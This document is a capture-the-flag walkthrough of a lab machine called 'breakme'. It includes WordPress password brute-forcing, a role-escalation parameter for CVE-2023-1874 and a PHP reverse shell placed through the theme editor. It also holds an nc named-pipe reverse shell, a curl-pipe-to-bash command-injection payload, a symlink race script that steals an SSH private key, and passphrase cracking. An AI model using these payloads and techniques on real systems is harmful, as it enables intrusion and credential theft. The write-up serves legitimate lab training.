Make sure to add the machine to your /etc/hosts file (use the IP of your current instance; it changes when the box is redeployed):
echo '10.10.219.246 breakme.thm' | sudo tee -a /etc/hosts
(`sudo echo ... >> /etc/hosts` does not work: the redirection is performed by your unprivileged shell, not by sudo, so the write is denied.)
Port Scanning:
rustscan -a breakme.thm
Visiting The Web Page on Port 80:
Directory Fuzzing:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://breakme.thm/FUZZ
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://breakme.thm/wordpress/FUZZ
More Digging:
Found a login page at http://breakme.thm/wordpress/wp-login.php and confirmed a valid user “admin” (WordPress returns a different error for an unknown username than for a wrong password).
Now, scanning with wpscan:
wpscan --url http://breakme.thm/wordpress/ -U admin -P ~/Desktop/WordLists/Passwords/rockyou.txt
(--url takes the site root, not wp-login.php; wpscan finds the login endpoint itself.)
No password was found.
Next, I enumerated users, plugins and themes with wpscan (-e u,p,t):
wpscan --url http://breakme.thm/wordpress/ -e u,p,t
It found two users (admin and bob) and one plugin (WP Data Access):
Let’s try to crack bob’s password using wpscan
wpscan --url http://breakme.thm/wordpress/ -U bob -P ~/Desktop/WordLists/Passwords/rockyou.txt
CHECKMATE!
Let’s login using these credentials.
Logged in as bob there is nothing useful to see, so I checked whether the WP Data Access plugin that wpscan reported is vulnerable. It is: versions up to 5.3.7 let any authenticated user change their own role (CVE-2023-1874):
https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
Gaining admin is a matter of submitting the normal profile-update form (Users > Profile, which posts to wp-admin/profile.php), intercepting the request, and appending the following parameter to the body; the plugin applies it on profile update without checking that the caller is allowed to assign roles:
wpda_role[]=administrator
And now we are Admins!
Time to get a reverse shell!
As admin, the theme editor lets us write PHP that the web server will execute. Replace the contents of the Twenty Twenty-One theme's 404.php with a PHP reverse shell pointing at our listener and save it:
http://breakme.thm/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone
After updating the file, visit the following URL and make sure you have an open listener:
http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php
Now. Time To Cook!!
Make the terminal stable with:
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
In /var/www/html/wordpress, wp-config.php holds the database credentials (DB_USER / DB_PASSWORD); note them, they are often reused elsewhere.
Port Forwarding
A service is listening on port 9999, but only on the target's loopback interface, so it has to be forwarded out before we can reach it. We'll use socat, which has to be present on the target (chisel would do the same job). The target first re-exposes 127.0.0.1:9999 on port 5555, then our machine pulls that back to a local port 9999. Note that the 5555 listener on the target is reachable by anyone on the network, not just us; kill it when done.
On target machine:
socat TCP-LISTEN:5555,fork TCP:127.0.0.1:9999
On our machine (10.10.72.131 is the target's current address):
socat TCP-LISTEN:9999,fork TCP:10.10.72.131:5555
Then visit http://127.0.0.1:9999/
Testing The Website:
After poking around the website, I entered the following characters into the user field to see which ones are filtered:
!@#$%^&*()_+-={}[]|:;’”<>,.?/
Result:
The “|” character survives the filter, so a value that starts with | ends the intended command and runs ours. The payload below also uses ${IFS} in place of spaces, which is what gets it past a space filter: inside the shell that runs the command, ${IFS} expands to whitespace.
Let’s try to get a reverse shell.
Create a file named reverse.sh (the name the curl command below fetches) with the following; the IP and port must be those of the listener on your machine:
#!/bin/bash
# named-pipe reverse shell: bash reads commands from the fifo, nc carries its I/O to the listener
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.6.62.127 4444 >/tmp/f
Start a python server on port 8000
python3 -m http.server 8000
Then, with the listener running, enter the following in the user field of the website; the leading pipe ends the original command, ${IFS} stands in for the spaces, and the IP is that of the machine serving reverse.sh:
|curl${IFS}http://10.9.3.146:8000/reverse.sh|bash
Et Voilà!
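As an added example (constructed here, not the code of the service on 9999), the following stand-in models what the working payload implies about the handler: it strips spaces from the user field and then hands the value to a shell as part of a command string. It shows that | starts a second command, that a plain space in the payload is removed while ${IFS} survives and expands to whitespace inside the shell that runs the command, and how the same lookup looks when the value is allow-listed and passed as an argument instead. The function names, the echo command standing in for whatever the real handler runs, and the space-stripping filter are assumptions.

```shell
#!/bin/sh
# Added example (constructed stand-in, not the code of the service on 9999).
# Models a handler that strips spaces from the "user" field and then pastes
# the value into a shell command string.

# The naive filter assumed here: drop spaces, keep everything else.
strip_spaces() { printf '%s' "$1" | tr -d ' '; }

# Vulnerable: the filtered value is pasted into a command line that a second
# shell re-parses, so "|" keeps its meaning and ${IFS} is expanded there.
vulnerable_lookup() {
    user=$(strip_spaces "$1")
    sh -c "echo hello $user" 2>&1
}

# Hardened: allow-list the value and pass it as a separate argument; no shell
# ever re-parses it, so "|" and ${IFS} are just characters in a string.
safe_lookup() {
    printf '%s' "$1" | grep -Eq '^[A-Za-z0-9._-]+$' || { echo "rejected"; return 1; }
    printf 'hello %s\n' "$1"
}

# Stand-alone demo: the space-separated payload breaks, the ${IFS} one runs.
printf 'space payload -> %s\n' "$(vulnerable_lookup '|echo injected')"      # command not found
printf 'IFS payload   -> %s\n' "$(vulnerable_lookup '|echo${IFS}injected')" # injected
printf 'hardened      -> %s\n' "$(safe_lookup '|echo${IFS}injected')"       # rejected
```

The fix is not a better blocklist: as long as the value reaches a shell as text, some encoding of a separator will get through. Passing it as an argument to the program that needs it (and validating its shape) removes the shell from the path entirely.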
We got our first
First we grabbed linpeas and ran it on the box. It flagged an SUID binary, readfile, in youcef's home directory. We pulled the binary back to our machine and decompiled it with Ghidra (with some cleanup help from ChatGPT), which gave a readable look-alike of the source:
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <string.h>
    #include <assert.h>

    #define TARGET_UID 0x3ea // 1002 in decimal: the only real UID allowed to use the binary

    // Reconstructed from the decompilation; it keeps the binary's behaviour,
    // including the check-then-open ordering that the symlink race below abuses.
    int main(int argc, char *argv[]) {
        int access_check;
        uid_t user_id;
        ssize_t bytes_read;
        struct stat file_stat;
        char buffer[1024];
        int file_descriptor;
        int read_bytes;
        int write_bytes = 0;
        unsigned int is_symlink;
        char *flag_check;
        char *id_rsa_check;

        // Exactly one argument: the file to read
        if (argc == 2) {
            // Does the path exist? access() checks with the real UID, not the SUID owner
            access_check = access(argv[1], F_OK);
            if (access_check == 0) {
                // The caller's real user ID must be 1002
                user_id = getuid();
                if (user_id == TARGET_UID) {
                    // The path must not contain "flag" or "id_rsa" (only argv[1] is checked)
                    flag_check = strstr(argv[1], "flag");
                    id_rsa_check = strstr(argv[1], "id_rsa");
                    // The path must not be a symbolic link...
                    lstat(argv[1], &file_stat);
                    is_symlink = (file_stat.st_mode & S_IFMT) == S_IFLNK;
                    // ...and must be readable by the real user
                    access_check = access(argv[1], R_OK);
                    // All three checks look at the path, not at an open descriptor: the
                    // file can be swapped for a symlink between here and open(), which
                    // then follows it with the SUID owner's privileges (TOCTOU).
                    if (flag_check == NULL && is_symlink == 0 && access_check != -1 && id_rsa_check == NULL) {
                        puts("I guess you won!\n");
                        file_descriptor = open(argv[1], O_RDONLY);
                        if (file_descriptor < 0) {
                            assert(file_descriptor >= 0 && "Failed to open the file");
                        }
                        // Copy the file to stdout
                        do {
                            bytes_read = read(file_descriptor, buffer, sizeof(buffer));
                            read_bytes = (int)bytes_read;
                            if (read_bytes < 1) break;
                            write_bytes = write(STDOUT_FILENO, buffer, (long)read_bytes);
                        } while (write_bytes > 0);
                        return 0;
                    } else {
                        puts("Nice try!");
                        return 1;
                    }
                } else {
                    puts("You can't run this program");
                    return 1;
                }
            } else {
                puts("File Not Found");
                return 1;
            }
        } else {
            puts("Usage: ./readfile <FILE>");
            return 1;
        }
    }
Time to get SSH
Every check in readfile is done on the path before open() is called, so we race it: one loop keeps flipping a file named symlink between a plain file (which passes the not-a-symlink and readable checks) and a symlink to youcef's id_rsa (which open() then follows with youcef's privileges), while a second loop keeps calling the binary. The link name must not contain "flag" or "id_rsa", since only argv[1] is checked for those strings; the target it points to may. Two commands:
while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &
for i in {1..30}; do /home/youcef/readfile symlink; done
After a bit we’ll get the key
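The two commands above as a reusable helper, added here and not part of the original writeup. It includes a constructed mock of readfile (readfile_mock) that only reproduces the binary's check-then-open ordering and deliberately widens the window with a sleep so the race wins quickly offline; it confers no privilege. Setting READFILE=/home/youcef/readfile on the target runs the same function against the real binary, where the window is microseconds and thousands of attempts may be needed. The placeholder key text in the demo is constructed.

```shell
#!/bin/sh
# Added example (not part of the original writeup): the symlink race as a
# function, plus a constructed mock of readfile so it runs offline.

# Mock of the SUID binary: refuse symlinks, check readability, then open.
# The sleep stands in for the (much smaller) lstat()/open() gap in the binary.
readfile_mock() {
    if [ -L "$1" ]; then echo "Nice try!"; return 1; fi
    [ -r "$1" ] || { echo "Nice try!"; return 1; }
    sleep 0.02
    cat "$1"
}
READFILE="${READFILE:-readfile_mock}"   # assumption: set to /home/youcef/readfile on the target

# race_read TARGET LINK [ATTEMPTS]: flip LINK between a plain file and a
# symlink to TARGET while calling readfile on it, until a key comes back.
race_read() {
    target="$1"; link="$2"; max="${3:-200}"
    # The binary rejects paths containing these substrings; LINK is the only
    # path it sees, so the name must avoid them (the target may contain them).
    case "$link" in
        *flag*|*id_rsa*) echo "link name must not contain flag/id_rsa" >&2; return 2 ;;
    esac
    rm -f "$link"
    # Flipper: symlink -> gone -> plain file, as fast as the shell can fork.
    ( while :; do ln -sf "$target" "$link"; rm -f "$link"; : > "$link"; done ) >/dev/null 2>&1 &
    flipper=$!
    n=0; got=""
    while [ "$n" -lt "$max" ]; do
        n=$((n + 1))
        out=$("$READFILE" "$link" 2>/dev/null) || true
        case "$out" in
            *"-----BEGIN"*) got="$out"; break ;;
        esac
    done
    kill "$flipper" 2>/dev/null || true
    wait "$flipper" 2>/dev/null || true
    rm -f "$link"
    [ -n "$got" ] || return 1
    printf '%s\n' "$got"
}

# Stand-alone demo against the mock, with a constructed placeholder "key".
demo=$(mktemp -d)
printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed placeholder\n-----END OPENSSH PRIVATE KEY-----\n' > "$demo/id_rsa"
race_read "$demo/id_rsa" "$demo/symlink" 300
rm -rf "$demo"
```

On the target, source the file with READFILE set and call the function directly, for example `READFILE=/home/youcef/readfile . ./race.sh` followed by `race_read /home/youcef/.ssh/id_rsa ./symlink 5000`; the function stops as soon as a line containing -----BEGIN is returned. The reason the race works at all is that the binary validates a path and then opens the same path again instead of opening once and validating the descriptor (fstat on the fd, or open with O_NOFOLLOW), so nothing stops the path from changing meaning in between.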
Once the key comes back (raise the 30 in the second loop if it does not; the window is small), save it on our machine with mode 600, convert it with ssh2john and crack its passphrase with john against rockyou, then SSH in as youcef with the key.
And got our second flag!
Time To Get Root!
Checking youcef's sudo privileges (sudo -l) shows a Python script that can be run as root.
Running the script with sudo
drops us into a restricted Python environment where some names and commands are blocked. After trying many payloads and reading through articles on Python jail escapes, we found one that works and gives us a shell as root.
And now go and get the root flag!
Happy Hacking!